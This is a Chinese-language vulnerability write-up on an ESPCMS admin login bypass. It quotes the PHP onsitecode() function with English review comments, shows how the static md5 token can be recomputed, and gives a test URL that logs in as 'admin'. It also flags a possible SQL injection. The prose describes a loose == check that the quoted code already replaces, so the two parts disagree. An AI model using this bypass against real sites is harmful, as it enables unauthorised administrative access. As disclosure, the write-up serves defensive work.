ESPCMS 后台登录绕过漏洞

时隔许久，已有同学相继发过这个 CMS 的漏洞；今天大致看了一下，问题仍然存在，官方也一直在修复。

问题出在后台文件 adminsoft\control\adminuser.php 中。

有问题的代码在函数 onsitecode() 中：
[php]
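/**
 * Remote ("site code") admin login.
 *
 * Reads `siteid`, `code` and `adminid` from the request. When `code` equals
 * md5(sitecoedb . '_' . server-ip . '_' . adminfile) it logs in the
 * admin_member row whose username is `adminid` (only rows with isclass=1 and
 * isremote=1): bumps intime/ipadd/hit, derives the permission list from the
 * user's powergroup, sets the esp_powerlist and ecisp_admininfo cookies,
 * writes a login log entry and redirects to the management tab. Every
 * failure path calls exit().
 *
 * SECURITY NOTE (review): the expected token is a deterministic digest of
 * static values - no nonce, no expiry, and not bound to `adminid` - so anyone
 * who can reproduce sitecoedb, the server IP and the adminfile constant can
 * mint a valid `code` and log in as any remote-enabled admin. Fixing that
 * means changing the token format on the issuing side as well (e.g. an HMAC
 * over adminid + timestamp with a per-site secret, plus a replay window),
 * which this method cannot do on its own. What is fixed here: the token
 * comparison is now strict and constant-time instead of PHP's loose `==`.
 */
function onsitecode() {
    parent::start_template();
    $db_table = db_prefix . "admin_member";
    $siteid = $this->fun->accept('siteid', 'R');
    $code = $this->fun->accept('code', 'R');
    $adminid = $this->fun->accept('adminid', 'R');
    $siteip = $this->fun->real_server_ip();

    // NOTE(review): siteid must be non-empty but is never used in the digest
    // or the lookup, so it does not restrict which site the token is valid for.
    if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) {
        exit();
    }
    $codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);

    // Strict, constant-time comparison of the supplied token. The previous
    // `$code == $codelist` applied loose comparison, so type juggling could
    // match (e.g. "0" == "0e1234..." for a digest that parses as a float).
    // hash_equals() also does not leak the mismatch position via timing;
    // fall back to `===` on PHP < 5.6 where it does not exist.
    $codeMatches = is_string($code)
        && (function_exists('hash_equals') ? hash_equals($codelist, $code) : $code === $codelist);
    if (!$codeMatches) {
        exit();
    }

    // NOTE(review): $adminid goes into the SQL string as-is. This assumes
    // accept() returns an already-escaped value - confirm, or quote it with
    // the db layer's escaping before building $db_where.
    $db_where = "username='$adminid' AND isclass=1 AND isremote=1";
    $rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where);
    if (!$rsMember) {
        exit('ESPCMS:Parameter error!');
    }

    // Record the login: timestamp, client address and hit counter.
    $ipadd = $this->fun->ip($_SERVER['REMOTE_ADDR']);
    $date = time();
    $db_set = "intime=$date,ipadd=$ipadd,hit=hit+1";
    $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);

    // Resolve the permission list. 'all' is passed through unchanged; any
    // other value is a '|'-separated list, and the cookie gets the set of
    // menu loadfun names from get_powermenulist('all') that are NOT in it.
    $db_table = db_prefix . 'admin_powergroup';
    $db_where = 'id=' . $rsMember['powergroup'];
    $rsPower = $this->db->fetch_first('SELECT powername,powerlist FROM ' . $db_table . ' WHERE ' . $db_where);
    if ($rsPower['powerlist'] != 'all') {
        $rsPower_array = explode('|', $rsPower['powerlist']);
        $rsPower_array = is_array($rsPower_array) ? $this->fun->exp_array($rsPower_array) : $rsPower_array;

        $sysArray = $this->get_powermenulist('all');
        $sys_newsArray = array();
        foreach ($sysArray as $key => $value) {
            $sys_newsArray[] = $value['loadfun'];
        }
        $sys_newsArray = $this->fun->exp_array($sys_newsArray);

        $diff_array = array_diff($sys_newsArray, $rsPower_array);
        $rsPower['powerlist'] = implode('|', $diff_array);
    }

    // Session cookies: the encoded permission list and the encoded identity
    // record (id|username|password field|md5(UA)|powergroup|inputclassid|md5(admin_ClassURL)).
    // Array keys are quoted here; the bare-word form ($rsMember[powergroup])
    // relied on undefined-constant fallback, which is a fatal error on PHP 8.
    $this->fun->setcookie("esp_powerlist", $this->fun->eccode($rsPower['powerlist'], 'ENCODE', db_pscode));
    $this->fun->setcookie('ecisp_admininfo', $this->fun->eccode("$rsMember[id]|$rsMember[username]|$rsMember[password]|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember['powergroup'] . '|' . $rsMember['inputclassid'] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode));
    $this->writelog($this->lng['adminuser_login_log_action'], $this->lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']);
    header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
    exit('true');
}
[/php]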
只要 $code == $codelist 就通过验证。而 $codelist 是由固定值计算出来的：
$codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);
其中 sitecoedb 来自站点配置，$siteip 是服务器 IP（real_server_ip()），adminfile 是常量。这个“口令”没有随机数、没有有效期，也没有和 adminid 绑定，因此只要能获得（或猜到）这三个值，就可以自行计算出合法的 code，伪造远程登录。另外这里用的是宽松比较 ==，而不是 === 或 hash_equals()。
测试 URL 如下：
index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea
访问后即以该管理员身份登录后台。注意：示例中的 code 值只对 sitecoedb、服务器 IP、adminfile 都一致的站点有效，针对其他站点需要按上面的公式重新计算；siteid 只要求非空，并不参与校验；adminid 必须是 isclass=1 且 isremote=1 的管理员账号。
